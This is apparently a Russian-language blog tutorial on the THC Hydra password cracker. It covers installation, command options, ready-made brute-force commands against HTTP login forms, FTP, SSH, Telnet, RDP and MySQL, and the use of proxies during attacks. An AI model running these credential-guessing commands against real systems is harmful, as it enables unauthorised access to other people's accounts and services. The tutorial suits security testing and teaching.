full

full

Х а к е р

Взломщик паролей THC Hydra

//


Вступление

Вы думаете, что ваши пароли надежны и безопасны? Вы ошибаетесь! Существует множество вариантов защиты вашего пароля, но когда дело доходит до Password Cracker THC Hydra, все готово. Тем не менее, вы можете использовать некоторые методы криптографии для защиты вашего пароля или, по крайней мере, затруднить взлом.

Очень важно отметить, что этот инструмент является просто доказательством концепции, которая дает исследователям и специалистам по безопасности возможность увидеть, как они могут защитить себя от таких атак.

Взломщик паролей THC Hydra

Hydra - распараллеленный взломщик паролей, который поддерживает множество протоколов для атаки. Это очень быстро и гибко, и новые модули легко добавлять. Этот инструмент позволяет исследователям и консультантам по безопасности показать, как легко получить удаленный несанкционированный доступ к системе.

Вы часто будете сталкиваться с информацией, которая указывает на то, что hydra является одним из самых быстрых взломщиков сетевого входа в систему, а также вы увидите, что hydra поддерживает несколько протокольных атак, в отличие от других хакерских утилит.

Hydra поддерживает следующие протоколы:

  • Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
  • HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST,
  • HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
  • HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
  • Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP,Rexec,
  • Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3,SOCKS5,
  • SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Установка THC Hydra

Первым шагом является загрузка и компиляция THC-Hydra (чистая компиляция, протестированная на Linux, Windows / Cygwin, Solaris, FreeBSD / OpenBSD, QNX (Blackberry 10) и MacOS).

Установите гидру с помощью следующих команд:

$ git clone https://github.com/vanhauser-thc/thc-hydra
$ cd thc-hydra/
$ ./configure
$ make
$ make install

Примечание: для модуля ssh вам нужно настроить libssh (не libssh2) И для поддержки ssh v1, просто добавьте -DWITH_SSH1=On в командной строке cmake.

[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!

Чтобы установить необходимые библиотеки (xhydra), пользователи Ubuntu / Debian должны запустить:

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
                libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
                firebird-dev libncp-dev


Исключения:

  • Модули Oracle, SAP R / 3 и Apple Logging Protocols - вам необходимо скачать и установить их из соответствующих источников;
  • Другие системы на основе производных Linux / BSD - используйте установщик системного программного обеспечения и найдите подходящие библиотеки;
  • Другое - скачать и установить исходные библиотеки и скомпилировать их вручную.

Команды THC Hydra

  • Введите ./hydra -h тоже, чтобы увидеть все доступные параметры командной строки или
  • hydra для более короткой версии.
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

v vrebose mode

l логин

p <password_file/список слов>

e nsr, дополнительные проверки, «n» для нулевого пароля, «s» - попытка входа как проход, «r» - обратный вход как прохода

t <количество параллельных соединений>

w <максимальное время ожидания ответа>

f : выйти после первой пары логин / пароль

m : OPTIONS - специфичные для модуля опции. Посмотрите в hydra -U <module>, какие опции доступны.


Примеры взломщика паролей Hydra

HTTP-POST-FORM:

$ hydra -l plague -P passList.txt -vV -f -t 5 192.168.1.100 http-post-form "/wp/Forum/login.php:log=^USER^&pwd=^PASS^:login_error"
  • http-post-form: поддерживаемый сервис
  • login_error: grep текст из формы HTML, если вход не выполнен
  • log: form username имя поля ввода
  • pwd: имя поля ввода пароля формы

Пример FTP (WordList):

$ hydra -s 21 -V -l plague -P wordlist.txt -e s -t 10 -w 5 192.168.1.100 ftp

Пример SSH(WordList):

$ hydra -s 22 -V -l plague -P wordlist.txt -t 10 -f 192.168.1.100 ssh

Пример Telnet (WordList):

$ hydra -s 23 -V -l plague -P wordlist.txt -e ns -t 10 -w 5 -f -m 192.168.1.100 telnet

Пример HTTP Login (WordList). For HTTPS set “https-get”:

$ hydra 192.168.1.1 http-get -v -V -l telekom -P wordlist.txt -e ns -t 5 -w 30 -m / -f

Пример RDP (WordList):

$ hydra -t 4 -V -l plague -P wordlist.txt rdp://192.168.1.100

Пример MySQL (WordList):

$ hydra -t 4 -V -f -l plague -e ns -P wordlist.txt 192.168.1.100 mysql


Восстановить прерванную сессию

Файл hydra.restore содержит всю необходимую для восстановления сессии информацию, которая записывается каждые 5 минут. Итак, если гидра выходит из строя или вы просто прерываете ее с помощью Control + C, вы найдете всю информацию в этом файле. ПРИМЕЧАНИЕ: вы не можете скопировать файл hydra.restore на разные платформы.


Сканирование/Взлом прокси

Переменная окружения HYDRA_PROXY_HTTP определяет веб-прокси (* это работает только для службы http / www!). Используйте следующий синтаксис:

HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"

Вы можете использовать переменную HYDRA_PROXY для сканирования / взлома всех других служб с таким же синтаксисом:

HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port


Report Page